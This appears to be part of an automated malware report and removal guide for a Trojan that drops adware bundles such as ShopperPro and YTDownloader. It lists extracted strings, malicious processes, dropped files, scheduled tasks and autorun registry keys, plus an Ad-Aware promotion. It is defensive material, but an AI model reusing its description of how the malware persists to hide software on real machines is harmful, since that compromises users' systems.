ADVAPI32.dll
OLEAUT32.dll
bxsdk32.dll
i:\build\boxedapp_src\src\boxedapp\bxsdk\bin\release_full\bxsdk32.pdb
`.rsrc
v2.0.50727
BoxedAppSDK_AppDomainManager.dll
System.Security
.ctor
System.Security.Policy
System.Reflection
System.Runtime.InteropServices
System.Diagnostics
System.Runtime.CompilerServices
System.IO
DllImportAttribute
shell32.dll
lpCmdLine
System.Collections
System.Security.Permissions
1.0.0.0
$87cd9ac9-2a94-4a9b-aee1-8d25d6a19f78
I:\build\boxedapp_src\src\BoxedApp\bxsdk\obj\x86\Release_Full\BoxedAppSDK_AppDomainManager.pdb
mscoree.dll
BoxedAppSDKThunk.dll
i:\build\boxedapp_src\src\boxedapp\bxsdk\obj\win32\release_full\boxedappsdkthunk\BoxedAppSDKThunk.pdb
.reloc
TLSSupport.dll
i:\build\boxedapp_src\src\boxedapp\bxsdk\obj\win32\release_full\tlssupport\TLSSupport.pdb
GdiPlus.dll
HKEY_USERS
HKEY_CURRENT_CONFIG
HKEY_LOCAL_MACHINE
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
BrowserHelper.exe:3952
Owxbocg.exe:3476
ping.exe:3544
ping.exe:2200
ping.exe:2440
ping.exe:3428
ping.exe:3660
ping.exe:3380
ping.exe:2616
ping.exe:2936
ping.exe:2448
ping.exe:3936
ping.exe:2192
ping.exe:1768
ping.exe:476
ping.exe:2624
ping.exe:3984
ping.exe:2828
ping.exe:2944
ping.exe:2820
ns19.tmp:3928
ins_sense.exe:2400
find.exe:1336
f.exe:3008
Wiwyiyugmbkl.exe:3564
sc.exe:3620
sc.exe:1368
sc.exe:3300
net.exe:3464
net.exe:3828
net1.exe:1388
net1.exe:3552
setup.exe:2060
setup.exe:3052
tcpsvcs.exe:2296
ins_geforce.exe:2388
ShopperPro.exe:2116
c98dc9.exe:3000
ins_shopperpro.exe:1204
regsvr32.exe:2224
%original file name%.exe:608
%original file name%.exe:2164
%original file name%.exe:2156
%original file name%.exe:576
%original file name%.exe:228
BROWSE~2.EXE:3668
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temp\nsy15.tmp\vdutpty.dll (30344 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KLQF81U3\ipgeoapi[1] (40 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy15.tmp\bprbcxj.dll (5 bytes)
%Program Files%\Sense\81f9e262-02a6-4ea6-97d4-4caa9d97c07c-5.exe (7726 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy15.tmp\System.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy15.tmp\pvmkp.dll (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy15.tmp\ybviqo.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy15.tmp\63246 (39765 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst14.tmp (541196 bytes)
%WinDir%\Tasks\81f9e262-02a6-4ea6-97d4-4caa9d97c07c-5.job (72 bytes)
%Program Files%\Sense\utils.exe (66065 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy15.tmp\205121 (9520 bytes)
%Program Files%\Sense\Uninstall.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy15.tmp\zbacizheh.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy15.tmp\hcrejpusx.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy15.tmp\xlcieu.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv10.tmp\Owxbocg.exe (1217838 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv10.tmp\ybviqo.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv10.tmp\Ltyvpos.tmp (332963 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv10.tmp\ikjtrx.dll (2028 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv10.tmp\zbacizheh.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\29UNGT6N\snsch7[1].exe_c (129726 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\29UNGT6N\snsch7[1].exe_b (129726 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\29UNGT6N\snsch7[1].exe_a (129726 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\8593.bat (407 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\29UNGT6N\snsch7[1].exe_e (129726 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\29UNGT6N\snsch7[1].exe_d (129726 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv17.tmp (595014 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa18.tmp\System.dll (784 bytes)
%WinDir%\Tasks\fe56664a-ffec-4080-bee0-aa32cf23ac94-5.job (72 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa18.tmp\hdiyyhpn.dll (4 bytes)
%Program Files%\Ge-Force\fe56664a-ffec-4080-bee0-aa32cf23ac94-5.exe (7726 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa18.tmp\eetruve.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa18.tmp\348421 (8876 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa18.tmp\ewcryykvh.dll (5 bytes)
%Program Files%\Ge-Force\Uninstall.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa18.tmp\vokcloqal.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa18.tmp\fejdf.dll (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa18.tmp\kidpn.dll (29608 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y41BH0NX\ipgeoapi[1] (40 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa18.tmp\caaig.dll (14 bytes)
%Program Files%\Ge-Force\utils.exe (65077 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa18.tmp\406185 (39553 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\nsExec.dll (6 bytes)
%Program Files%\ShopperPro\Updater.exe (25776 bytes)
%Program Files%\ShopperPro\manifest.json (595 bytes)
%Program Files%\ShopperPro\database1_0_0.json (4 bytes)
%Documents and Settings%\All Users\Documents\ShopperPro\JsDriver\Config.xml (1 bytes)
%Program Files%\ShopperPro\SPRemove.exe (20416 bytes)
%Program Files%\ShopperPro\FireFox\chrome.manifest (113 bytes)
%Program Files%\ShopperPro\FireFox\content\overlay.xul (203 bytes)
%Program Files%\ShopperPro\JSDriver\jsdrv.exe (100378 bytes)
%Program Files%\ShopperPro\ShopperPro64.dll (18424 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\jsdrv.exe (100378 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\AccDownload.dll (9320 bytes)
%Program Files%\ShopperPro\JSDriver\jsdrv.sys (1552 bytes)
%Program Files%\ShopperPro\ShopperPro.dll (15536 bytes)
%Program Files%\ShopperPro\FireFox\install.rdf (828 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\nsProcess.dll (4 bytes)
%Program Files%\ShopperPro\FireFox\content\overlay.js (13 bytes)
%Program Files%\ShopperPro\FireFox\content\shopperpro_128.png (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp (156512 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\ns8.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\MoreInfo.dll (7 bytes)
%Program Files%\ShopperPro\ShopperPro.exe (33633 bytes)
%WinDir%\Tasks\ShopperProJSUpd.job (888 bytes)
%Program Files%\ShopperPro\database1_0_0.ej (6 bytes)
%Program Files%\YTDownloader\libeay32.dll (25608 bytes)
%WinDir%\Tasks\YTDownloader.job (942 bytes)
%Program Files%\YTDownloader\rtmpdump.exe (14285 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfD.tmp\System.dll (11 bytes)
%Program Files%\YTDownloader\YTDownloader.exe (44478 bytes)
%Program Files%\YTDownloader\DownloadAPI.dll (48500 bytes)
%Program Files%\YTDownloader\Unelevate.exe (2748 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfD.tmp\ns19.tmp (6 bytes)
%Program Files%\YTDownloader\BrowserHelper.exe (11035 bytes)
%Program Files%\YTDownloader\YTD-icon-128x128.png (8 bytes)
%Program Files%\YTDownloader\BrowserHelperSrv.exe (4236 bytes)
%Program Files%\YTDownloader\Updater.exe (17576 bytes)
%Program Files%\YTDownloader\download_ani.gif (9 bytes)
%Program Files%\YTDownloader\DownloadHelper.exe (10762 bytes)
%Program Files%\YTDownloader\AniGIF.ocx (5635 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfD.tmp\AccDownload.dll (9226 bytes)
%Program Files%\YTDownloader\ssleay32.dll (4079 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfD.tmp\nsProcess.dll (4 bytes)
%Program Files%\YTDownloader\convert_aniBW.gif (7 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\YTDownloader\YTDownloader.lnk (1 bytes)
%Documents and Settings%\%current user%\Desktop\YTDownloader.lnk (1 bytes)
%Program Files%\YTDownloader\sbmntr.sys (28 bytes)
%Program Files%\Common Files\System\SysMenu.dll (15287 bytes)
%Program Files%\YTDownloader\YTDUninstall.exe (20022 bytes)
%Program Files%\YTDownloader\Download_completed.ico (1 bytes)
%Program Files%\YTDownloader\convert_ani.gif (765 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfD.tmp\nsExec.dll (6 bytes)
%Program Files%\YTDownloader\converter.exe (61415 bytes)
%WinDir%\Tasks\YTDownloaderUpd.job (912 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoB.tmp\D1958.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoB.tmp\NK.lky (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoB.tmp\setup.exe (2555480 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszA.tmp (242363 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoB.tmp\setup1.exe (229796 bytes)
%WinDir%\Tasks\ShopperPro.job (2150 bytes)
%Documents and Settings%\All Users\Application Data\ShopperPro\config.json (488 bytes)
%Documents and Settings%\All Users\Application Data\ShopperPro\ShopperPro.dll (2321 bytes)
%Documents and Settings%\All Users\Application Data\ShopperPro\ShopperPro64.dll (3361 bytes)
%Program Files%\ShopperPro\config.json (488 bytes)
%Documents and Settings%\All Users\Application Data\ShopperPro\database1_0_0.ej (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm12.tmp\caaig.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\29UNGT6N\setup[1].exe_e (130226 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\29UNGT6N\setup[1].exe_d (130226 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\29UNGT6N\setup[1].exe_a (130226 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\29UNGT6N\setup[1].exe_c (130226 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\29UNGT6N\setup[1].exe_b (130226 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm12.tmp\vokcloqal.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm12.tmp\cnhwe.dll (2057 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm12.tmp\Wptsit.tmp (333899 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm12.tmp\Wiwyiyugmbkl.exe (1224639 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp3.tmp\NK.lky (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp2.tmp (82355 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp3.tmp\setup.exe (869966 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp3.tmp\setup1.exe (79085 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp3.tmp\D1958.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Install_25149\ins_sense.exe (1509 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Install_25149\ins_geforce.exe (1509 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\29UNGT6N\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Install_25149\ins_shopperpro.exe (31368 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\UD6RSBGT\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y41BH0NX\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KLQF81U3\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Install_25149\bxsdk32.dll (9731 bytes)
- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"YTDownloader" = "%Program Files%\YTDownloader\YTDownloader.exe /boot"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"YTDownloader" = "%Program Files%\YTDownloader\YTDownloader.exe /boot"
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.